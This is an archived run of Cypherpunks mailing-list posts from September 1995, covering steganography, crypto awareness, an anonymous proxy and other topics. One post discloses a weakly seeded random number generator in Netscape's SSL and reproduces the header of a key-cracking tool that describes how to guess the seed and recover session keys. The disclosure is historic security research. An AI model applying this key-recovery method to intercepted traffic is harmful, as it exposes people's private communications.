perhaps > if a stealth capable pgp2.x was worked on, and a few features > demonstrated, the 3.0 folks would be willing to take a look at it to > evaluate the features for possible version 3.0 inclusion. Exactly. > Good stego tools are the other main problem. I concur. > > My understanding is that all of the stego programs to date do it by > just ripping out the LSB of an audio or graphic image, and replacing > that with the bits from a message with a stealthed message. > As I understood the current implementation, stego is fairly easy to sniff out. Am I mistaken in this? > Sending masses of pictures around is kind of suspicious tho, I mean > several a day, each freshly scanned from what? I guess if video > conferencing gets here, it would be fun to add the stego into that > noisy stream, same for internet phone. Perhaps, but hardly as suspicious as sending naked random data. I think given hard to sniff stego, and the nationwide bandwidth, this is a non-issue. > Text stego, with bits hidden in the entropy of english text seems a > harder objective, but a useful one. Indeed. > I'm presuming that plausible deniability, and facilities for anonymity > are essentials. How does one go about doing that? Using newsgroups > to carry on a two level communication might be a good way of > maintaining plausible deniability. Either a stego interface to > remailers in other countries, so that the stego gateway to remailers > scans its newspool, decrypts messages addressed to it, and forwards > that off to the anon remailers. The outcome could be a further text > or graphics stegoed message for posting to a suitably high noise news > group. The recipient is also scanning his news spool for stego > messages addressed to him. > > Sounds feasible. Perhaps a proof of concept would be easy to knock > up, if a place holder is inserted for the 'good text stego' program > should go. There was a 'texto' posted a while ago which did something > suitable. 
> > Adam I believe all these to be in everyone's best interest. From pcw at access.digex.net Sun Sep 17 16:39:14 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sun, 17 Sep 95 16:39:14 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: in" -- this doesn't mean madonna stole it, does it? > >I'm reminded of the time a few years a go that there were two films in >release simultaneously named "Black Rain", and, most oddly, both took >place in Japan. > >Perry This is not as odd as you might think once you realize that the rain that fell after the atomic bombing was black. -Peter From sbryan at maroon.tc.umn.edu Sun Sep 17 16:47:09 1995 From: sbryan at maroon.tc.umn.edu (Steve Bryan) Date: Sun, 17 Sep 95 16:47:09 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: At 8:36 pm 9/16/95, Steven Levy wrote: >>I saw "Hackers" yesterday. It's not bad and its political sensibility is >>very cyberpunk. The ad campaign even uses the tag line, "Their only crime >>is curiosity." > >It may not be a crime, but it's not nice to steal a title. I suppose this means that when "Hackers" comes out on video there's no point in looking for a cameo appearance of the author of the identically named book? From NSCEE at aurora.nscee.edu Sun Sep 17 17:16:34 1995 From: NSCEE at aurora.nscee.edu (NSCEE at aurora.nscee.edu) Date: Sun, 17 Sep 95 17:16:34 PDT Subject: FAX Encryption Software In-Reply-To: <43hun9$n2b@news1.deltanet.com> Message-ID: <9509180016.AA26906@aurora.nscee.edu> FYI: This was posted to a slew of Usenet newsgroups. Unless I've missed something, which "CRYPTO-STRONG" package has ever been "licensed" by the "U.S. Department of Commerce"? Does anybody have more info on this product or the good folks behind it? ===================================================================== Originally posted by: clav at deltanet.com >ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY >SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE??? > >Aliroo Ltd. 
has developed a Windows, eye-to-eye fax/email >encryption package called PrivaSoft. > >Unlike any previously devised system, this method protects, with >only 4 mouse clicks, fax and email transmissions in electronic >and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT >IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. > >You can encrypt a message, and then fax or email it (via plain >old standard fax machine or fax modem), print it to paper or save >to a disk file. > >It is fully licensed, without restriction for export, by the U.S. >Department of Commerce. NO PGP WORRIES. > >Email me for a free copy which will be sent to you via email or >snail mail post. It is fully functional (not crippleware) and >enables you to try our system out before purchase with 8 free >page scrambles. It retails for $130 per installed computer. >Looking for end users and distributors. > >Thanks, >David From jsimmons at goblin.punk.net Sun Sep 17 17:18:40 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Sun, 17 Sep 95 17:18:40 PDT Subject: CYPHERPUNK considered harmful In-Reply-To: Message-ID: <199509180014.RAA00341@goblin.punk.net> > > On Sun, 17 Sep 1995, Black Unicorn wrote: > > So if you are so intouch with Joe Sixpack, what does he think? Do you > have some evidence to suggest that there is any widespread awareness of > the issues among Joe and Jane? Surveys? Studies? Anything? > > Go out on the street and ask 10 random people. Hell, ask 10 > intellectuals not in the computer science field. I think your level of > disillusion will approach mine, and if not, then I do not give your > powers of observation much credit. > Actually, I think it's even worse than that. I dropped by the weekly 'meeting' of the Cal Poly SLO Computer Club (OK, these are the locally notorious slo.punks, and the meeting is more of a social get together than anything) last Monday night. 
I was interested in getting people's reactions to having a large number of people's anon.penet IDs publicly posted. What I found was kind of scary. No one was aware of the existence of any other remailers than anon.penet. Everyone assumed that the University is logging all mail to anon.penet, and no one particularly cared. One woman asked me why she should use PGP when it could be so quickly broken. Turns out (I am NOT making this up) she didn't know the difference between PGP and ROT_13! Knowledge of security was limited to the technical details of setting up systems such as Kerberos and firewalls and not using your SSN for a password. No one had any idea of the algorithms involved, or which ones are truly secure and which ones can be easily broken. Etc. These are all undergraduates in the process of getting BSCS degrees. -- Jeff Simmons jsimmons at goblin.punk.net From s675570 at aix2.uottawa.ca Sun Sep 17 17:37:11 1995 From: s675570 at aix2.uottawa.ca (s675570 at aix2.uottawa.ca) Date: Sun, 17 Sep 95 17:37:11 PDT Subject: Joe Sixpack and his TV Message-ID: If Mr. & Mrs J. Sixpack seem to know zilch at present about strong or any other kind of crypto, would it maybe, possibly have to do with a lack of exposure to it on the soap operas of their favorite media, ie TV? Hmmm. The general level of paranoia on X-Files (100 million viewers all over the world, rabid internet following) is even higher than on this list, and the usual discussions on this list would read like a free vacation to their scriptwriters and researchers. Anyone have any scriptwriting skills? 100 million potential subscribers to toad are at stake... (Yes I guess then we'd have to move to usenet distribution. But think how entertaining our flame wars would become. Yes I'm definitely calling for it, and the big house with the hot tub would be nice too. Only half joking. Honestly though, anyone want to find out their email addresses and send out a gratis subscription to toad? 
A script would be nice too. It's better exposure than five seconds of Tim with Connie Chung.) From rah at shipwright.com Sun Sep 17 17:58:26 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 17 Sep 95 17:58:26 PDT Subject: Joe Sixpack and his TV Message-ID: >(...It's better exposure >than five seconds of Tim with Connie Chung.) Connie: "So it's really true that you're an anarchist? That you believe that semi-*automatic weapons* and strong *cryptography* should be *freely* available to *everyone*? and that strong cryptography on a *public* network like the *internet* will bring about the collapse of nation states all over the *world*?" Tim: "Yes." Connie: "But, what about *democracy*? What about the will of the *people*?" Tim: "What about them?" A little more than 5 seconds, but I believe that captures her inflection pretty nicely, don't you think? Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From perry at piermont.com Sun Sep 17 18:12:24 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 17 Sep 95 18:12:24 PDT Subject: Joe Sixpack and his TV In-Reply-To: Message-ID: <199509180112.VAA28385@frankenstein.piermont.com> It also captures Tim nicely. I'll point out, though, that exchanges like that can be handled properly or badly. Doing it right means answering truthfully but in a way that explains your position rather than alienating the audience. When you have time to answer questions like that (TV isn't a medium suitable for this) the right way to answer the last one is to do something like referencing Thoreau. By the way, I like the opening of Civil Disobedience so much I thought I'd post it. 
I heartily accept the motto, "That government is best which governs least"; and I should like to see it acted up to more rapidly and systematically. Carried out, it finally amounts to this, which also I believe--"That government is best which governs not at all"; and when men are prepared for it, that will be the kind of government which they will have. Perry Robert Hettinga writes: > >(...It's better exposure > >than five seconds of Tim with Connie Chung.) > > Connie: "So it's really true that you're an anarchist? That you believe that > semi-*automatic weapons* and strong *cryptography* should > be *freely* available to *everyone*? and that strong > cryptography on a *public* network like the *internet* will > bring about the collapse of nation states all over the > *world*?" > > Tim: "Yes." > > Connie: "But, what about *democracy*? What about the will of the *people*?" > > Tim: "What about them?" > > A little more than 5 seconds, but I believe that captures her inflection > pretty nicely, don't you think? From unicorn at polaris.mindport.net Sun Sep 17 18:19:52 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 17 Sep 95 18:19:52 PDT Subject: Joe Sixpack and his TV In-Reply-To: Message-ID: On Sun, 17 Sep 1995 s675570 at aix2.uottawa.ca wrote: > If Mr. & Mrs J. Sixpack seem to know zilch at present about strong or any > other kind of crypto, would it maybe, possibly have to do with a lack > of exposure to it on the soap operas of their favorite media, ie TV? Hmmm. > > The general level of paranoia on X-Files (100 million viewers all over the > world, rabid internet following) is even higher than on this list, and > the usual discussions on this list would read like a free vacation to their > scriptwriters and researchers. Anyone have any scriptwriting skills? > 100 million potential subscribers to toad are at stake... (Yes I guess then > we'd have to move to usenet distribution. But think how entertaining our > flame wars would become. 
Yes I'm definitely calling for it, and the big > house with the hot tub would be nice too. Only half joking. Honestly though, > anyone want to find out their email addresses and send out a gratis > subscription to toad? A script would be nice too. It's better exposure > than five seconds of Tim with Connie Chung.) > As I understand it shows like "The X-Files" don't accept unsolicited scripts. Not surprising as I'm sure they have writer's agreements. --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From dl at hplyot.obspm.fr Sun Sep 17 18:57:46 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Sun, 17 Sep 95 18:57:46 PDT Subject: Anonymous WWW proxy Alpha release available Message-ID: <9509180157.AA13253@hplyot.obspm.fr> -----BEGIN PGP SIGNED MESSAGE----- If you are interested, the first (alpha) version of my anonymous httpd proxy is available, see http://hplyot.obspm.fr:6661/ (where it runs, unless it dies meanwhile, then see http://hplyot.obspm.fr/~dl/wwwtools.html or mail me) Ok, what does it do more than cern's : + It's single process, light, and mostly multi-tasking + It removes all nasty 'personal' infos like user-agent, referer,... 
+ If there is a "ProxyControl: V1 " in the header, it will send the request first to the first proxy listed in the list, sending to that one a "ProxyControl: V1 " header + If you launch your personal copy of the AnonProxyHttp with arguments "port 2 ph1:pp1 ph2:pp2 ph3:pp3" and setenv http_proxy http://localhost:port/ accessing the web now goes through your AnonProxy, which randomly creates a route to your url going through 2 of the 3 specified other AnonProxy What will come when I'll have some time : + more flexibility in the spec of the other AnonProxies and a centralized and/or distributed catalog of available proxies What I need folks for : + get it and run it (and debug?), so we could chain them :-) What is the big catch/problem : + it's written in .... Tcl + tcl-dp + tclX ! (plz don't flame me...) so you need a tcl-dp+tclX interp to try it locally... Feedback / Comments / ... welcome Regards dl - -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAgUBMFzRIXk52/beodHxAQFGzAP+Kl4ImRpuYIjSk7rtEjGIoPVSv1d1j6sq 9GIgmFgRLSyiw2LcYzlFNxtEOqAjM2k+rJttHxavKOJb+eeAzqZP7ihWHfBv8FS3 56SiCw16h2OPsEeZ4TOkUmMTEGDWHJKN9tfVac4qpuG1LZ7A2RejMAUV9qp02LNg Vch5aDWlPNc= =AvS/ -----END PGP SIGNATURE----- From acollier at crl.com Sun Sep 17 18:59:49 1995 From: acollier at crl.com (acollier at crl.com) Date: Sun, 17 Sep 95 18:59:49 PDT Subject: FAX Encryption Software In-Reply-To: <43hvft$n2b@news1.deltanet.com> Message-ID: <43ii1t$210@nntp.crl.com> clav at deltanet.com wrote: >ANYONE FOR A CRYPTO-STRONG, YET EASY TO USE FAX/EMAIL SECURITY >SOFTWARE PACKAGE FOR BUSINESS OR OTHER USE??? >Aliroo Ltd. has developed a Windows, eye-to-eye fax/email >encryption package called PrivaSoft. 
>Unlike any previously devised system, this method protects, with >only 4 mouse clicks, fax and email transmissions in electronic >and even paper form - FROM THE TIME YOU CREATE A MESSAGE UNTIL IT >IS READ - NOT JUST WHEN YOUR FAX IS BEING TRANSMITTED. >You can encrypt a message, and then fax or email it (via plain >old standard fax machine or fax modem), print it to paper or save >to a disk file. >It is fully licensed, without restriction for export, by the U.S. >Department of Commerce. NO PGP WORRIES. Also no worries about security - if DOC says you can have it, you can bet that NSA has seen to it that it is cryptographically weak, or else uses a key escrow system (where somebody else can get to the keys), and as insecure as any other non-published method. For all we know, they may be using a cereal box decoder ring setup. >Email me for a free copy which will be sent to you via email or >snail mail post. It is fully functional (not crippleware) and >enables you to try our system out before purchase with 8 free >page scrambles. It retails for $130 per installed computer. >Looking for end users and distributors. >Thanks, >David From gnu at toad.com Sun Sep 17 20:24:13 1995 From: gnu at toad.com (John Gilmore) Date: Sun, 17 Sep 95 20:24:13 PDT Subject: Central Banking for the 21st Century -- Thurs 28Sep, San Fran Message-ID: <9509180324.AA29978@toad.com> The Pacific Research Forum, a local libertarian economics group, is sponsoring a talk by Dr. Jerry L. Jordan, president of the Federal Reserve Bank of Cleveland and Dr. Donald T. Brash, governor of the Reserve Bank of New Zealand, with moderator Dr. William S. Haraf, director of public policy for BofA. The forum is 3:30-5PM at the Banker's Club, 555 California St, 51st floor, SF. The reception is 5PM-6PM. It costs $25; RSVP to Cindy Sparks at +1 415 989 0833. "Central banks were originally intended to bring price stability to a paper-based bank payments system. 
But what will be the proper role of a central bank in the rapidly approaching era of digital money? What happens to monetary policy, supervision and regulation, as well as financial services such as clearing checks, when electronically-initiated debits and credits become the transaction of choice?" ..."Dr. Jordan predicts that ... the proliferation of digital money will provide new challenges for central banks laboring to provide stable money." I'll probably see you there... -- John Gilmore gnu at toad.com -- gnu at eff.org Don't introduce that Tsutomu to your girlfriend. From iang at CS.Berkeley.EDU Sun Sep 17 21:41:08 1995 From: iang at CS.Berkeley.EDU (Ian Goldberg) Date: Sun, 17 Sep 95 21:41:08 PDT Subject: Netscape SSL implementation cracked! Message-ID: <199509180441.VAA16683@lagos.CS.Berkeley.EDU> As some of you may recall, a few weeks ago I posted a reverse-compilation of the random number generation routine used by netscape to choose challenge data and encryption keys. Recently, one of my officemates (David Wagner) and I (Ian Goldberg) finished the job of seeing exactly how the encryption keys are picked. What we discovered is that, at least on the systems we checked (Solaris and HP-UX), the seed value for the RNG was fairly trivial to guess by someone with an account on the machine running netscape (so much so that in this situation, it usually takes less than 1 minute to find the key), and not too hard for people without accounts, either. See below for details. I've included the header to a program we wrote to do this key-cracking below. I would like to get some information, though: o Where should I put the full source (1 file, ~12k) so that ITAR lovers don't get mad at me? o Where can I find a version of netscape that does RC4-128? It is likely that it suffers from the same problem, and even a brute-force search of the entire seed space is _much_ less than 128 bits. 
Happy hacking,

- Ian "who just saw _Hackers_ today with some other Bay Area cypherpunks, and it put me in the mood"

/* unssl.c - Last update: 950917
 *
 * Break netscape's shoddy implementation of SSL on some platforms
 * (tested for netscape running RC4-40 on Solaris and HP-UX; other
 * Unices are probably similar; other crypt methods are unknown, but
 * it is likely that RC4-128 will have the same problems).
 *
 * The idea is this: netscape seeds the random number generator it
 * uses to produce challenge-data and master keys with a combination
 * of the time in seconds and microseconds, the pid and the ppid.
 * Of these, only the microseconds is hard to determine by someone
 * who (a) can watch your packets on the network and (b) has access
 * to any account on the system running netscape.
 *
 * Even if (b) is not satisfied, the time can often be obtained from
 * the time or daytime network daemons; an approximation to the pid
 * can sometimes be obtained from a mail daemon (the pid is part of
 * most Message-ID's); the ppid will usually be not much smaller than
 * the pid, and has a higher than average chance of being 1.
 *
 * Clever guessing of these values will in all likelihood cut the
 * expected search space down to less than brute-forcing a 40-bit
 * key, and certainly is less than brute-forcing a 128-bit key.
 *
 * Subsequent https: connections after the first (even to different
 * hosts) seem to _not_ reseed the RNG. This makes things much
 * easier, once you've broken the first message. Just keep
 * generating 16 bytes of random numbers until you get the
 * challenge-data for the next message. The next key will then be
 * the 16 random bytes after that.
 *
 * main() and bits of MD5Transform1 by Ian Goldberg and David Wagner.
 * The rest is taken from the standard MD5 code; see below.
 *
 * This code seems to want to run on a big-endian machine. There may
 * be other problems as well.
 *
 * This code is provided as-is; if it causes you to lose your data,
 * sleep, civil liberties, or SO, that's your problem.
 *
 * #include
 *
 * On the command line, give the time in seconds, the pid, the ppid
 * and the SSL challenge data (each byte in hex, separated by some
 * non-hex character like a colon) of the _first_ SSL message
 * generated by the instance of netscape. This program will search
 * through the microsecond values. You may need to run it again with
 * a slightly different value for the seconds, depending on how
 * accurately you know the time on the system running netscape.
 *
 * The output will be the master key (all 16 bytes; note you never
 * even told the program the 11 bytes you knew) and the value for
 * the microseconds that produced it.
 *
 * As a benchmark, this code runs in just under 25 seconds real time
 * (for an unsuccessful search through 1<<20 values for the
 * microseconds) on an unloaded HP 712/80.
 */

From unicorn at polaris.mindport.net Sun Sep 17 22:09:52 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Sun, 17 Sep 95 22:09:52 PDT
Subject: Netscape SSL implementation cracked!
In-Reply-To: <199509180441.VAA16683@lagos.CS.Berkeley.EDU>
Message-ID:

Excellent work!

---
"In fact, had Bancroft not existed, potestas scientiae in usu est
Franklin might have had to invent him." in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information

From sandfort at crl.com Sun Sep 17 22:15:27 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Sun, 17 Sep 95 22:15:27 PDT
Subject: Joe Sixpack and his TV
In-Reply-To:
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 17 Sep 1995, Black Unicorn wrote:

> As I understand it shows like "The X-Files" don't accept unsolicited
> scripts. Not surprising as I'm sure they have writer's agreements.

Nobody accepts unsolicited scripts for legal reasons. The real question is, do they accept outside scripts? Some shows do; some shows don't.
IF they do, they will send freelance writers a show "bible," which is a writer's guide to the basic rules concerning the structure, history, characters, etc. of the show. If you're interested, you should drop them a note asking if they accept scripts from outsiders. Giving the production offices a call would let you know what their attitude is about submissions.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From cwe at it.kth.se Sun Sep 17 22:26:37 1995
From: cwe at it.kth.se (Christian Wettergren)
Date: Sun, 17 Sep 95 22:26:37 PDT
Subject: Netscape SSL implementation is broken!
Message-ID: <199509180525.HAA06519@piraya.electrum.kth.se>

Hi!

Neat, I'd say. Has everyone sold their Netscape Comm stock yet? :-)

I guess we should send them the draft-ietf-security-randomness-00.txt asap.

I was also thinking about how many Credit Card numbers will pass between now and the moment Netscape has done anything about it. This piece of information does have quite a value, I'd say.

I have included a short program that tries to generate non-guessable random numbers. It was written a bit back, and my coding style isn't all that good. It might be interesting, or not. (Btw, if you find any problems with it, I'd appreciate to know about it.)

/Christian

----- ZZ: README -----

asadi - "As strong as DES is" (hopefully)

Written by: Christian Wettergren cwe at nada.kth.se February 1993

Introduction
------------

This utility generates a "random" hexstring, which can be used as input to xauth, for example. It uses a private secret and some other input to generate the hexstring. In this way a long-term secret can be used to generate a short-term secret. Since the short-term secret might be compromised (different xauth cookies might be tried repeatedly, since no warning is emitted from the Xserver) it is not safe to use the same secret on repeated occasions.
This utility does not even need a private long-term secret, since it may use the ticket generated within the Kerberos authentication system. In this way the long-term secret is as guarded as your private password or the Kerberos master-password.

If you don't use the Kerberos system, you have to regenerate the long-term secret sometimes (in the same way as you change your password). This utility tries to help you with that step too. A decent pseudo-random generator is included, and a routine that helps you generate the secret might be run.

The short-term secret won't reveal anything about the long-term secret, since the long-term secret is altered and then encrypted with DES. The result is the short-term secret.

Search space
------------

The algorithm used to generate the long-term secret tries to enlarge the search-space as much as possible, so that an exhaustive attack becomes difficult. The factors involved are:

1/ A good random generator
2/ time-of-day
3/ user entered text
4/ user dependent elapsed time
5/ pid of process
6/ hostid of computer
7/ not using consecutive values from random generator (initial throw-away & intermediate throw-away.)

The most important of all is of course the random generator. The included generator is a minimum standard.

Probable usage: echo add $DISPLAY MIT-MAGIC-COOKIE-1 `asadi` | xauth

DISCLAIMER: No guarantees are made about this program, explicit or implicit. It is distributed AS IS. etc... :-)

opensafely() - open file, try not to reveal when it was written. Unfortunately, this is not possible! No matter how this is done, at least the ctime reveals when it was written. If I don't remember incorrectly, there are bugs in the filesystem under SunOS, so that the ctime-field is updated too often. Maybe this might distort this field sometimes. Another approach might be to chmod the file whenever it is used. In this way its ctime field is updated and hence overwritten.
It does not reveal anything extra either, since the approximate time when the cookie is generated is probably shown in ~/.Xauthority anyway.

/* gensecret() - generate a good secret "random" file.

This routine tries to enlarge the search-space for a potential cracker. The involved factors are:

1/ A good random generator (see accompanying file.)
2/ time-of-day
3/ user entered text
4/ user dependent elapsed time
5/ pid of process
6/ hostid of computer
7/ not using consecutive values from random generator (initial throw-away & intermediate throw-away.)

This approach hopefully deters an attack, or at least makes it considerably harder for the attacker. Does anyone see any weakness in the above approach? It is not based on any cryptological analysis, so no guarantees are made of its appropriateness. */

fprintf(stderr, "asadi - generate a good random hexstring based on\n");
fprintf(stderr, "        a private secret as a seed. (This secret can\n");
fprintf(stderr, "        be the Kerberos ticket-file.) Could be used\n");
fprintf(stderr, "        for getting a good xauth-cookie, for example.\n\n");
fprintf(stderr, "Usage: asadi [-r] [-l n] [-v] [filename]\n");
fprintf(stderr, "    -r       -- generate a secret file (default: ~/.secret\n");
fprintf(stderr, "    -l n     -- how many 8-byte blocks to output (default: 16)\n");
fprintf(stderr, "    -v       -- verbose, not very interesting.\n");
fprintf(stderr, "    filename -- name of secret file (default: Kerberos\n");
fprintf(stderr, "                ticket file, or ~/.secret)\n");

---- ZZ: asadi.c ----

/*****************************************
  asadi v1.1 - "As strong as DES is" (hopefully)

  This utility generates a "random" hexstring, which can be used
  as input to xauth, for example. Either a Kerberos ticketfile or
  a secret file is used as seed to the random generator. Other
  input is probably hostid, process id and time, depending on the
  implementation of the DES-library. The random generator used is
  the DES-algorithm.
  This method is guaranteed not to reveal anything about the used
  seed. To crack the cookie you have to crack DES. (There is also
  a normal good pseudo-random generator included, to facilitate
  the generation of secrets.)

  Written by: Christian Wettergren cwe at nada.kth.se February 1993

  Usage: asadi [keyfilename] [-v] [-l num] [-r]

  The number of 8-byte blocks to generate can be controlled with
  the -l-switch. There is also a verbose-switch. If one does not
  use Kerberos, a secret file can be used as a key instead. The
  contents of this file will not be revealed by this program, but
  you should of course NOT USE your password anyway! To help
  generate this secret file is a decent (according to its author,
  not me) random-generator included in this program. Use the
  r-switch for this. It deposits the secret in the file ~/.secret
  (with the appropriate chmod). This file is also used if there is
  no Kerberos.

  Probable usage: echo add $DISPLAY MIT-MAGIC-COOKIE-1 `asadi` | xauth

  DISCLAIMER: No guarantees are made about this program, explicit
  or implicit. It is distributed AS IS. etc... :-)
 *****************************************/

/* Settings of this program */
#define USEKRB                  /* switches the use of Kerberos on/off */
#define DEFAULTKEYLEN 8         /* multiples of 16 nibbles */
#define SECRETFILE ".secret"

/* the header names after each #include are missing from the archived copy */
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef USEKRB
#include
#endif

/* some unprototyped routines */
extern char *getpass();
extern void goodsrand(unsigned long);
extern unsigned long goodrand(void);
extern char *getenv(char *);
extern void *malloc(int);

/* Globals */
char *keyfile = NULL;
int vflag = 0;
int keylen = DEFAULTKEYLEN;
int major = 1;                  /* version of program */
int minor = 0;

/* calculate a secret key from the file. */
/* Algorithm: read 8 bytes, add them byte-wise to the cblock, continue
   until eof. Hence there is no actual reason to use files larger than
   eight bytes, but the above approach is used since the ticket-files
   are larger.
   (In this way I don't have to care about file's structure too
   much, either.) */
void calcsecretkey(char *file, des_cblock *key)
{
    des_cblock tmp;
    int i;
    int fd;

    if (vflag)
        fprintf(stderr, "file: %s\n", keyfile);

    if ((fd = open(file, O_RDONLY)) == -1) {
        fprintf(stderr, "Could not open '%s', no cookie generated! (errno=%d)\n", file, errno);
        exit(1);
    }

    /* bytes are only accumulated into *key here; the caller must have
       zeroed it first */
    while (read(fd, &tmp, sizeof(des_cblock)) == sizeof(des_cblock)) {
        for (i = 0; i < sizeof(des_cblock); i++)
            *((unsigned char *)key + i) = *((unsigned char *)key + i) + *((unsigned char *)tmp + i);
        DES_ZERO_CBLOCK(tmp);   /* fixes eof-condition */
    }

    /* close the file */
    if (close(fd) == -1) {
        fprintf(stderr, "Could not close file! (errno=%d)\n", errno);
        exit(1);
    }
}

void printcblock(FILE *fd, des_cblock *blk)
{
    int i;

    for (i = 0; i < sizeof(des_cblock); i++) {
        fprintf(fd, "%02x", (unsigned int)(*((unsigned char *)blk + i) & 255));
    }
}

/* opensafely() - open file, try not to reveal when it was written.
   Unfortunately, this is not possible! No matter how this is done, at
   least the ctime reveals when it was written. If I don't remember
   incorrectly, there are bugs in the filesystem under SunOS, so that
   the ctime-field is updated too often. Maybe this might distort this
   field sometimes. Another approach might be to chmod the file
   whenever it is used. In this way its ctime field is updated and
   hence overwritten. It does not reveal anything extra either, since
   the approximate time when the cookie is generated is probably shown
   in ~/.Xauthority anyway. */
int opensafely(char *file)
{
    int fd;

    /* delete old file, if any */
    if (unlink(file) == -1) {
        if (errno != ENOENT) {
            fprintf(stderr, "Error: could not unlink '%s'. (errno=%d)\n", file, errno);
            exit(1);
        }
    }

    /* open it again */
    if ((fd = open(file, O_WRONLY|O_CREAT, S_IRUSR)) == -1) {
        fprintf(stderr, "Error: could not create '%s'. (errno=%d)\n", file, errno);
        exit(1);
    }
    return (fd);
}

/* gensecret() - generate a good secret "random" file.
   This routine tries to enlarge the search-space for a potential
   cracker. The involved factors are:
   1/ A good random generator (see accompanying file.)
   2/ time-of-day
   3/ user entered text
   4/ user dependent elapsed time
   5/ pid of process
   6/ hostid of computer
   7/ not using consecutive values from random generator (initial
      throw-away & intermediate throw-away.)
   This approach hopefully deters an attack, or at least makes it
   considerably harder for the attacker. Does anyone see any weakness
   in the above approach? It is not based on any cryptological
   analysis, so no guarantees are made of its appropriateness. */
void gensecret(char *file)
{
    int i, j;
    struct timeval t, s;
    unsigned long d, u, v;
    int fd;
    unsigned long x;
    char *c;
    char n[100];
    int ta, b;
    struct utimbuf tm;

    /* Get time before enter */
    gettimeofday(&s, (struct timezone *)0);

    /* heading */
    printf("\nGenerating a Secret!\n");

    /* get user's response */
    printf("\nCAUTION! Don't use your password below!\n");
    printf("You don't have to remember this data, so\n");
    printf("just type something in.\n\n");
    c = getpass("Enter something:");

    /* get time after enter */
    gettimeofday(&t, (struct timezone *)0);
    d = t.tv_usec - s.tv_usec;

    /* make something of input; u must start at zero, otherwise the xor
       below folds in whatever was on the stack */
    u = 0;
    for (j = 0; j < strlen(c) / sizeof(unsigned long); j++) {
        /* collect sizeof(long) bytes of input */
        for (v = 0, i = 0; i < sizeof(unsigned long); i++)
            v = (v << 8) + c[i + j * sizeof(unsigned long)];
        /* xor them together */
        u ^= v;
    }

    /* get throw-away factors; fgets() bounds the read to n[], which
       gets() cannot */
    printf("\nEnter a throw-away factor: ");
    fgets(n, sizeof(n), stdin);
    ta = atoi(n);
    printf("\nEnter a step factor: ");
    fgets(n, sizeof(n), stdin);
    b = atoi(n);

    /* verbose */
    if (vflag) {
        fprintf(stderr, "text: %s\n", c);
        fprintf(stderr, "garbled text: %ld\n", u);
        fprintf(stderr, "elapsed: %ld\n", d);
        fprintf(stderr, "time: %ld %ld\n", t.tv_sec, t.tv_usec);
        fprintf(stderr, "pid: %d\n", getpid());
        fprintf(stderr, "hostid: %d\n", gethostid());
        fprintf(stderr, "throw-away factor: %d\n", ta);
        fprintf(stderr, "step factor: %d\n", b);
        fprintf(stderr, "generated seed: %ld\n",
                t.tv_usec ^ t.tv_sec ^ d ^ getpid() ^ gethostid() ^ u);
    }

    /* init random generator */
    goodsrand(t.tv_usec ^ t.tv_sec ^ d ^ getpid() ^ gethostid() ^ u);

    /* open the file safely */
    fd = opensafely(keyfile);

    /* throw-away ta numbers */
    for (i = 0; i < ta; i++)
        (void)goodrand();

    /* this actually writes sizeof(long) times too much data, but it
       does not matter. */
    for (i = 0; i
    /* text is missing from the archived copy here; what follows is the
       body of rand.c */

#define m (unsigned long)2147483647
#define q (unsigned long)127773
#define a (unsigned int)16807
#define r (unsigned int)2836

/*
** F(z) = (az)%m
**      = az-m(az/m)
**
** F(z) = G(z)+mT(z)
** G(z) = a(z%q)- r(z/q)
** T(z) = (z/q) - (az/m)
**
** F(z) = a(z%q)- rz/q+ m((z/q) - a(z/m))
**      = a(z%q)- rz/q+ m(z/q) - az
*/

/*
**
*/
unsigned long seed;

void goodsrand( /* unsigned long*/ initial_seed)
unsigned long initial_seed;
{
    seed = initial_seed;
}

/*
**
*/
unsigned long goodrand(/*void*/)
{
    register int lo, hi, test;

    /* Schrage's method: a*seed mod m without 32-bit overflow */
    hi = seed / q;
    lo = seed % q;
    test = a * lo - r * hi;
    if (test > 0)
        seed = test;
    else
        seed = test + m;
    return seed;
}

#ifdef TEST1
/*
** The result of running this program should be
** 1043618065. If this program does not yield this
** value then your compiler has not implemented this
** program correctly.
*/
main(/*void*/)
{
    unsigned long n_rand;
    register int i;
    int success = 0;

    goodsrand(1);
    for (i = 1; i <= 10001; i++) {
        n_rand = goodrand();
        if (i > 9998)
            printf("Sequence %5i, Seed= %10i\n", i, seed);
        if (i == 10000)
            if (seed == 1043618065)
                success = 1;
    }
    if (success) {
        printf("The random number generator works correctly.\n\n");
        exit(0);
    } else {
        printf("The random number generator DOES NOT WORK!\n\n");
        exit(1);
    }
}
#endif

/*
